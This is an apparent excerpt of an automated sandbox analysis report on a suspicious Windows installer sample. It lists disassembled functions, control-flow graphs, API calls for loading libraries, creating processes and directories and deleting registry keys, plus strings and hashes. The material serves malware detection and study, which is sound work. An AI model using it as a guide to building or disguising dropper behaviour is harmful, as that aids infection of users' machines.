                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                    • String ID: halituses
                                                                    • API String ID: 2531174081-2845610232
                                                                    • Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                    • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
                                                                    • Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                    • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 643 406601-406621 GetSystemDirectoryW 644 406623 643->644 645 406625-406627 643->645 644->645 646 406638-40663a 645->646 647 406629-406632 645->647 649 40663b-40666e wsprintfW LoadLibraryExW 646->649 647->646 648 406634-406636 647->648 648->649
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                    • wsprintfW.USER32 ref: 00406653
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                    • API String ID: 2200240437-1946221925
                                                                    • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                    • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                    • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                    • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 650 403116-40312d 651 403136-40313f 650->651 652 40312f 650->652 653 403141 651->653 654 403148-40314d 651->654 652->651 653->654 655 40315d-40316a call 40330e 654->655 656 40314f-403158 call 403324 654->656 660 403170-403174 655->660 661 4032fc 655->661 656->655 662 4032a7-4032a9 660->662 663 40317a-4031a0 GetTickCount 660->663 664 4032fe-4032ff 661->664 665 4032e9-4032ec 662->665 666 4032ab-4032ae 662->666 667 403304 663->667 668 4031a6-4031ae 663->668 669 403307-40330b 664->669 670 4032f1-4032fa call 40330e 665->670 671 4032ee 665->671 666->667 672 4032b0 666->672 667->669 673 4031b0 668->673 674 4031b3-4031c1 call 40330e 668->674 670->661 683 403301 670->683 671->670 676 4032b3-4032b9 672->676 673->674 674->661 682 4031c7-4031d0 674->682 679 4032bb 676->679 680 4032bd-4032cb call 40330e 676->680 679->680 680->661 688 4032cd-4032d9 call 405e3f 680->688 685 4031d6-4031f6 call 4067d2 682->685 683->667 692 4031fc-40320f GetTickCount 685->692 693 40329f-4032a1 685->693 694 4032a3-4032a5 688->694 695 4032db-4032e5 688->695 696 403211-403219 692->696 697 40325a-40325c 692->697 693->664 694->664 695->676 698 4032e7 695->698 699 403221-403252 MulDiv wsprintfW call 4052ff 696->699 700 40321b-40321f 696->700 701 403293-403297 697->701 702 40325e-403262 697->702 698->667 708 403257 699->708 700->697 700->699 701->668 703 40329d 701->703 705 403264-40326b call 405e3f 702->705 706 403279-403284 702->706 703->667 711 403270-403272 705->711 707 403287-40328b 706->707 707->685 710 403291 707->710 708->697 710->667 711->694 712 403274-403277 711->712 712->707
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$wsprintf
                                                                    • String ID: ... %d%%
                                                                    • API String ID: 551687249-2449383134
                                                                    • Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                    • Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
                                                                    • Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                    • Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 713 4057ce-405819 CreateDirectoryW 714 40581b-40581d 713->714 715 40581f-40582c GetLastError 713->715 716 405846-405848 714->716 715->716 717 40582e-405842 SetFileSecurityW 715->717 717->714 718 405844 GetLastError 717->718 718->716
                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                    • GetLastError.KERNEL32 ref: 00405825
                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                                                    • GetLastError.KERNEL32 ref: 00405844
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                    • String ID: C:\Users\user\Desktop
                                                                    • API String ID: 3449924974-2743851969
                                                                    • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                    • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                    • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                    • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 719 405dbc-405dc8 720 405dc9-405dfd GetTickCount GetTempFileNameW 719->720 721 405e0c-405e0e 720->721 722 405dff-405e01 720->722 724 405e06-405e09 721->724 722->720 723 405e03 722->723 723->724
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00405DDA
                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\ln5S7fIBkY.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6), ref: 00405DF5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: "C:\Users\user\Desktop\ln5S7fIBkY.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                    • API String ID: 1716503409-1960803263
                                                                    • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                    • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                    • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                    • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 729 402d44-402d6d call 406104 731 402d72-402d74 729->731 732 402d76-402d7c 731->732 733 402dec-402df0 731->733 734 402d98-402dad RegEnumKeyW 732->734 735 402d7e-402d80 734->735 736 402daf-402dc1 RegCloseKey call 406671 734->736 738 402dd0-402dde RegCloseKey 735->738 739 402d82-402d96 call 402d44 735->739 743 402de0-402de6 RegDeleteKeyW 736->743 744 402dc3-402dce 736->744 738->733 739->734 739->736 743->733 744->733
                                                                    APIs
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Close$Enum
                                                                    • String ID:
                                                                    • API String ID: 464197530-0
                                                                    • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                    • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                                                    • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                    • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                                                    APIs
                                                                      • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405C25
                                                                      • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                      • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                      • Part of subcall function 004057CE: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,00000000,000000F0), ref: 0040164D
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 00401640
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                    • String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                                                    • API String ID: 1892508949-2745823915
                                                                    • Opcode ID: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
                                                                    • Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
                                                                    • Opcode Fuzzy Hash: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
                                                                    • Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E
                                                                    APIs
                                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063D9,80000002), ref: 004061AB
                                                                    • RegCloseKey.KERNELBASE(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,halituses), ref: 004061B6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue
                                                                    • String ID: : Completed
                                                                    • API String ID: 3356406503-2954849223
                                                                    • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                    • Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
                                                                    • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                    • Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                    • CloseHandle.KERNEL32(?), ref: 004058B6
                                                                    Strings
                                                                    • Error launching installer, xrefs: 00405893
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 3712363035-66219284
                                                                    • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                    • Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
                                                                    • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                    • Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040205D
                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                      • Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,76F923A0), ref: 0040535A
                                                                      • Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                    • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
